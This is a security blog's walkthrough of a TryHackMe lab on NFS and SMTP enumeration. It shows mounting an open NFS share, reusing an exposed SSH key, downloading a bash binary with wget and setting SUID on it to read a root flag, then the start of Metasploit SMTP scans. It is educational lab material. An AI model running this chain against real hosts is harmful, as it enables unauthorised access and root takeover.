<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.7.0"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Writeup for TryHackMe room - Network Services 2" /><meta name="author" content="4n3i5v74" /><meta property="og:locale" content="en_US" /><meta name="description" content="A Security Blog from 4n3i5v74. Used for techincal contents, learning, writeups." /><meta property="og:description" content="A Security Blog from 4n3i5v74. Used for techincal contents, learning, writeups." /><link rel="canonical" href="https://4n3i5v74.github.io/posts/tryhackme-network-services-2/" /><meta property="og:url" content="https://4n3i5v74.github.io/posts/tryhackme-network-services-2/" /><meta property="og:site_name" content="4n3i5v74" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-12-13T00:00:00+05:30" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Writeup for TryHackMe room - Network Services 2" /><meta name="twitter:site" content="@nive1103" /><meta name="twitter:creator" content="@4n3i5v74" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"4n3i5v74"},"headline":"Writeup for TryHackMe room - Network Services 2","dateModified":"2021-05-13T23:09:48+05:30","datePublished":"2020-12-13T00:00:00+05:30","description":"A Security Blog from 4n3i5v74. Used for techincal contents, learning, writeups.","url":"https://4n3i5v74.github.io/posts/tryhackme-network-services-2/","mainEntityOfPage":{"@type":"WebPage","@id":"https://4n3i5v74.github.io/posts/tryhackme-network-services-2/"},"@type":"BlogPosting","@context":"https://schema.org"}</script><title>Writeup for TryHackMe room - Network Services 2 | 4n3i5v74</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" href="/assets/css/post.css" as="style"><link rel="stylesheet" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/local.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/copy-code.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">4n3i5v74</a></div><div class="site-subtitle font-italic">A Security Blog.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/4n3i5v74" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span>Posts</span> <span>Writeup for TryHackMe room - Network Services 2</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Writeup for TryHackMe room - Network Services 2</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sun, Dec 13, 2020, 12:00 AM +0530" > Dec 13, 2020 <i class="unloaded">2020-12-13T00:00:00+05:30</i> </span> by <span class="author"> 4n3i5v74 </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Thu, May 13, 2021, 11:09 PM +0530" > May 13 <i class="unloaded">2021-05-13T23:09:48+05:30</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1973 words">10 min</span></div></div><div class="post-content"><div class="flex-container"> <script src="https://tryhackme.com/badge/34685"></script></div><h2 id="network-services"><a href="https://tryhackme.com/room/networkservices2" target="_blank">Network Services</a></h2><p>This room contains info and methods to recon and enumerate <code>SMB</code>, <code>Telnet</code> and <code>FTP</code></p><p>For complete tryhackme path, refer the <a href="https://4n3i5v74.github.io/posts/getting-started-with-cybersecurity-tryhackme/" target="_blank">link</a></p><h2 id="nfs">NFS</h2><h3 id="task-2---understanding-nfs">Task 2 - Understanding NFS</h3><h3 id="references">References</h3><ul><li><a href="https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html" target="_blank">NFS reference</a><li><a href="https://www.datto.com/library/what-is-nfs-file-share" target="_blank">NFS reference</a><li><a href="http://nfs.sourceforge.net/" target="_blank">NFS reference</a><li><a href="https://wiki.archlinux.org/index.php/NFS" target="_blank">NFS reference</a></ul><h3 id="task-3---enumerating-nfs">Task 3 - Enumerating NFS</h3><h3 id="references-1">References</h3><ul><li><a href="https://4n3i5v74.github.io/posts/cheatsheet-nmap/" target="_blank">NMAP Reference</a></ul><p>Use <code>nmap</code> to find open ports.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="nmap%20-Pn%20-T4%20-p-%20-sS%20--reason%20--open%20%3Cip%3E" type="button"></button></div></div><pre><code>nmap -Pn -T4 -p- -sS --reason --open &lt;ip&gt;
</code></pre><p>An output similar to below will be obtained.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="Starting%20Nmap%207.70%20(%20https://nmap.org%20)%20at%202021-01-03%2022:27%20IST%0ANmap%20scan%20report%20for%20%3Cip%3E%0AHost%20is%20up,%20received%20user-set%20(0.18s%20latency).%0ANot%20shown:%2065528%20closed%20ports%0AReason:%2065528%20resets%0APORT%20%20%20%20%20%20STATE%20SERVICE%20REASON%0A22/tcp%20%20%20%20open%20%20ssh%20%20%20%20%20syn-ack%20ttl%2063%0A111/tcp%20%20%20open%20%20rpcbind%20syn-ack%20ttl%2063%0A2049/tcp%20%20open%20%20nfs%20%20%20%20%20syn-ack%20ttl%2063%0A32917/tcp%20open%20%20unknown%20syn-ack%20ttl%2063%0A37411/tcp%20open%20%20unknown%20syn-ack%20ttl%2063%0A39725/tcp%20open%20%20unknown%20syn-ack%20ttl%2063%0A43383/tcp%20open%20%20unknown%20syn-ack%20ttl%2063%0ANmap%20done:%201%20IP%20address%20(1%20host%20up)%20scanned%20in%20150.25%20seconds" type="button"></button></div></div><pre><code>Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 22:27 IST
Nmap scan report for &lt;ip&gt;
Host is up, received user-set (0.18s latency).
Not shown: 65528 closed ports
Reason: 65528 resets
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
111/tcp   open  rpcbind syn-ack ttl 63
2049/tcp  open  nfs     syn-ack ttl 63
32917/tcp open  unknown syn-ack ttl 63
37411/tcp open  unknown syn-ack ttl 63
39725/tcp open  unknown syn-ack ttl 63
43383/tcp open  unknown syn-ack ttl 63
Nmap done: 1 IP address (1 host up) scanned in 150.25 seconds
</code></pre><p>Since port <code>2049</code> is open, we can see if NFS server made any share as public accessible.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="showmount%20-e%20%3Cip%3E" type="button"></button></div></div><pre><code>showmount -e &lt;ip&gt;
</code></pre><p>An output similar to below will be obtained.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="Export%20list%20for%20%3Cip%3E:%0A/home%20*" type="button"></button></div></div><pre><code>Export list for &lt;ip&gt;:
/home *
</code></pre><p>Create a temporary folder in local machine and try to mount the NFS share.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="mkdir%20/tmp/mount%0Amount%20-t%20nfs%20%3Cip%3E:/home%20/tmp/mount%20-nolock%0Als%20-al%20/tmp/mount" type="button"></button></div></div><pre><code>mkdir /tmp/mount
mount -t nfs &lt;ip&gt;:/home /tmp/mount -nolock
ls -al /tmp/mount
</code></pre><p>Check if there are any interesting files we can make use of.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="ls%20-al%20/tmp/mount/cappucino%0Als%20-al%20/tmp/mount/cappucino/.ssh/" type="button"></button></div></div><pre><code>ls -al /tmp/mount/cappucino
ls -al /tmp/mount/cappucino/.ssh/
</code></pre><p>There is rsa key available. Check if its the same key used in <code>authorized_keys</code>.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="awk%20'%7Bprint%20$NF%7D'%20/tmp/mount/cappucino/.ssh/id_rsa.pub%0Aawk%20'%7Bprint%20$NF%7D'%20/tmp/mount/cappucino/.ssh/authorized_keys" type="button"></button></div></div><pre><code>awk '{print $NF}' /tmp/mount/cappucino/.ssh/id_rsa.pub
awk '{print $NF}' /tmp/mount/cappucino/.ssh/authorized_keys
</code></pre><p><code>SSH</code> to the host should work now with the rsa key present.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="ssh%20-i%20/tmp/mount/cappucino/.ssh/id_rsa%20cappucino@%3Cip%3E" type="button"></button></div></div><pre><code>ssh -i /tmp/mount/cappucino/.ssh/id_rsa cappucino@&lt;ip&gt;
</code></pre><h3 id="task-4---exploiting-nfs">Task 4 - Exploiting NFS</h3><h3 id="references-2">References</h3><ul><li><a href="https://github.com/polo-sec/writing/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash" target="_blank">Bash binary</a></ul><p>Even though ssh access is obtained, NFS implements <code>root-squash</code> setting, which maps remote root users to <code>nfsnobody</code>, which contains least privileges. This can be exploited using <code>SUID</code> bit set to binary.</p><p>Navigate to user’s home directory, download the bash binary, and set <code>SUID</code>.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="cd%20/tmp/mount/cappucino%0Awget%20https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash%0Achmod%20+s%20bash" type="button"></button></div></div><pre><code>cd /tmp/mount/cappucino
wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
chmod +s bash
</code></pre><p>Login to the machine with rsa key and see if <code>SUID</code> binary can be run to obtain privilege escalation.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="ssh%20-i%20/tmp/mount/cappucino/.ssh/id_rsa%20cappucino@%3Cip%3E%0A./bash%20-p%0Acat%20/root/root.txt%0A%20%20%20%20%3Cflag%3E" type="button"></button></div></div><pre><code>ssh -i /tmp/mount/cappucino/.ssh/id_rsa cappucino@&lt;ip&gt;
./bash -p
cat /root/root.txt
    &lt;flag&gt;
</code></pre><h2 id="smtp">SMTP</h2><h3 id="task-5---understanding-smtp">Task 5 - Understanding SMTP</h3><h3 id="references-3">References</h3><ul><li><a href="https://computer.howstuffworks.com/e-mail-messaging/email3.htm" target="_blank">SMTP Reference</a><li><a href="https://www.afternerd.com/blog/smtp/" target="_blank">SMTP Reference</a></ul><h3 id="task-6---enumerating-smtp">Task 6 - Enumerating SMTP</h3><h3 id="references-4">References</h3><ul><li><a href="https://4n3i5v74.github.io/posts/cheatsheet-nmap/" target="_blank">NMAP Reference</a></ul><p>Use <code>nmap</code> to find open ports using quick scan.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="nmap%20-Pn%20-T4%20-F%20-sS%20--reason%20--open%20%3Cip%3E" type="button"></button></div></div><pre><code>nmap -Pn -T4 -F -sS --reason --open &lt;ip&gt;
</code></pre><p>An output similar to below will be obtained.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="Starting%20Nmap%207.70%20(%20https://nmap.org%20)%20at%202021-01-05%2023:06%20IST%0ANmap%20scan%20report%20for%20%3Cip%3E%0AHost%20is%20up,%20received%20user-set%20(0.16s%20latency).%0ANot%20shown:%2098%20closed%20ports%0AReason:%2098%20resets%0APORT%20%20%20STATE%20SERVICE%20REASON%0A22/tcp%20open%20%20ssh%20%20%20%20%20syn-ack%20ttl%2063%0A25/tcp%20open%20%20smtp%20%20%20%20syn-ack%20ttl%2063%0A%0ANmap%20done:%201%20IP%20address%20(1%20host%20up)%20scanned%20in%202.17%20seconds" type="button"></button></div></div><pre><code>Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-05 23:06 IST
Nmap scan report for &lt;ip&gt;
Host is up, received user-set (0.16s latency).
Not shown: 98 closed ports
Reason: 98 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
25/tcp open  smtp    syn-ack ttl 63

Nmap done: 1 IP address (1 host up) scanned in 2.17 seconds
</code></pre><p>Use <code>msfconsole</code> to perform auxiliary scans and get information on <code>smtp</code>.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="msfconsole%0A%20%20%20%20msf6%20%3E%20search%20smtp_version%0A%0A%20%20%20%20Matching%20Modules%0A%0A%20%20%20%20%20%20%20#%20%20Name%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Disclosure%20Date%20%20Rank%20%20%20%20Check%20%20Description%0A%20%20%20%20%20%20%20-%20%20----%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20---------------%20%20----%20%20%20%20-----%20%20-----------%0A%20%20%20%20%20%20%200%20%20auxiliary/scanner/smtp/smtp_version%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20normal%20%20No%20%20%20%20%20SMTP%20Banner%20Grabber%0A%0A%20%20%20%20msf6%20%3E%20use%20auxiliary/scanner/smtp/smtp_version%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_version)%20%3E%20options%0A%0A%20%20%20%20Module%20options%20(auxiliary/scanner/smtp/smtp_version):%0A%0A%20%20%20%20%20%20%20Name%20%20%20%20%20Current%20Setting%20%20Required%20%20Description%0A%20%20%20%20%20%20%20----%20%20%20%20%20---------------%20%20--------%20%20-----------%0A%20%20%20%20%20%20%20RHOSTS%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20host(s),%20range%20CIDR%20identifier,%20or%20hosts%20file%20with%20syntax%20'file:%3Cpath%3E'%0A%20%20%20%20%20%20%20RPORT%20%20%20%2025%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20port%20(TCP)%0A%20%20%20%20%20%20%20THREADS%20%201%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20number%20of%20concurrent%20threads%20(max%20one%20per%20host)%0A%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_version)%20%3E%20set%20RHOSTS%20%3Cip%3E%0A%20%20%20%20RHOSTS%20=%3E%20%3Cip%3E%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_version)%20%3E%20exploit%0A%0A%20%20%20%20[+]%20%3Cip%3E:25%20%20%20%20%20%20-%20%3Cip%3E:25%20SMTP%20220%20polosmtp.home%20ESMTP%20Postfix%20(Ubuntu)%5Cx0d%5Cx0a%0A%20%20%20%20[*]%20%3Cip%3E:25%20%20%20%20%20%20-%20Scanned%201%20of%201%20hosts%20(100%25%20complete)%0A%20%20%20%20[*]%20Auxiliary%20module%20execution%20completed%0A%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_version)%20%3E%20use%20auxiliary/scanner/smtp/smtp_relay%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_relay)%20%3E%20options%0A%0A%20%20%20%20Module%20options%20(auxiliary/scanner/smtp/smtp_relay):%0A%0A%20%20%20%20%20%20%20Name%20%20%20%20%20%20Current%20Setting%20%20%20%20%20Required%20%20Description%0A%20%20%20%20%20%20%20----%20%20%20%20%20%20---------------%20%20%20%20%20--------%20%20-----------%0A%20%20%20%20%20%20%20EXTENDED%20%20false%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20Do%20all%20the%2016%20extended%20checks%0A%20%20%20%20%20%20%20MAILFROM%20%20sender@example.com%20%20yes%20%20%20%20%20%20%20FROM%20address%20of%20the%20e-mail%0A%20%20%20%20%20%20%20MAILTO%20%20%20%20target@example.com%20%20yes%20%20%20%20%20%20%20TO%20address%20of%20the%20e-mail%0A%20%20%20%20%20%20%20RHOSTS%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20host(s),%20range%20CIDR%20identifier,%20or%20hosts%20file%20with%20syntax%20'file:%3Cpath%3E'%0A%20%20%20%20%20%20%20RPORT%20%20%20%20%2025%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20port%20(TCP)%0A%20%20%20%20%20%20%20THREADS%20%20%201%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20number%20of%20concurrent%20threads%20(max%20one%20per%20host)%0A%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_relay)%20%3E%20set%20RHOSTS%20%3Cip%3E%0A%20%20%20%20RHOSTS%20=%3E%20%3Cip%3E%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_relay)%20%3E%20exploit%0A%0A%20%20%20%20[+]%20%3Cip%3E:25%20%20%20%20%20%20-%20SMTP%20220%20polosmtp.home%20ESMTP%20Postfix%20(Ubuntu)%5Cx0d%5Cx0a%0A%20%20%20%20[*]%20%3Cip%3E:25%20%20%20%20%20%20-%20No%20relay%20detected%0A%20%20%20%20[*]%20%3Cip%3E:25%20%20%20%20%20%20-%20Scanned%201%20of%201%20hosts%20(100%25%20complete)%0A%20%20%20%20[*]%20Auxiliary%20module%20execution%20completed%0A%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_relay)%20%3E%20use%20auxiliary/scanner/smtp/smtp_enum%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_enum)%20%3E%20options%0A%0A%20%20%20%20Module%20options%20(auxiliary/scanner/smtp/smtp_enum):%0A%0A%20%20%20%20%20%20%20Name%20%20%20%20%20%20%20Current%20Setting%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Required%20%20Description%0A%20%20%20%20%20%20%20----%20%20%20%20%20%20%20---------------%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20--------%20%20-----------%0A%20%20%20%20%20%20%20RHOSTS%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20host(s),%20range%20CIDR%20%20identifier,%20or%20hosts%20file%20with%20syntax%20'file:%3Cpath%3E'%0A%20%20%20%20%20%20%20RPORT%20%20%20%20%20%2025%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20port%20(TCP)%0A%20%20%20%20%20%20%20THREADS%20%20%20%201%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20number%20of%20concurrent%20threads%20(max%20%20%20one%20per%20host)%0A%20%20%20%20%20%20%20UNIXONLY%20%20%20true%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20Skip%20Microsoft%20bannered%20servers%20when%20%20%20%20testing%20unix%20users%0A%20%20%20%20%20%20%20USER_FILE%20%20/opt/metasploit-framework/embedded/framework/data/wordlists/unix_users.txt%20%20yes%20%20%20%20%20%20%20The%20file%20that%20contains%20a%20list%20of%20%20%20%20probable%20users%20accounts.%0A%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_enum)%20%3E%20set%20USER_FILE%20/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt%0A%20%20%20%20USER_FILE%20=%3E%20/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_enum)%20%3E%20set%20RHOSTS%20%3Cip%3E%0A%20%20%20%20RHOSTS%20=%3E%20%3Cip%3E%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_enum)%20%3E%20set%20THREADS%2016%0A%20%20%20%20THREADS%20=%3E%2016%0A%0A%20%20%20%20msf6%20auxiliary(scanner/smtp/smtp_enum)%20%3E%20exploit%0A%0A%20%20%20%20[*]%20%3Cip%3E:25%20%20%20%20%20%20-%20%3Cip%3E:25%20Banner:%20220%20polosmtp.home%20ESMTP%20Postfix%20(Ubuntu)%0A%20%20%20%20[+]%20%3Cip%3E:25%20%20%20%20%20%20-%20%3Cip%3E:25%20Users%20found:%20administrator%0A%20%20%20%20[*]%20%3Cip%3E:25%20%20%20%20%20%20-%20Scanned%201%20of%201%20hosts%20(100%25%20complete)%0A%20%20%20%20[*]%20Auxiliary%20module%20execution%20completed" type="button"></button></div></div><pre><code>msfconsole
    msf6 &gt; search smtp_version

    Matching Modules

       #  Name                                 Disclosure Date  Rank    Check  Description
       -  ----                                 ---------------  ----    -----  -----------
       0  auxiliary/scanner/smtp/smtp_version                   normal  No     SMTP Banner Grabber

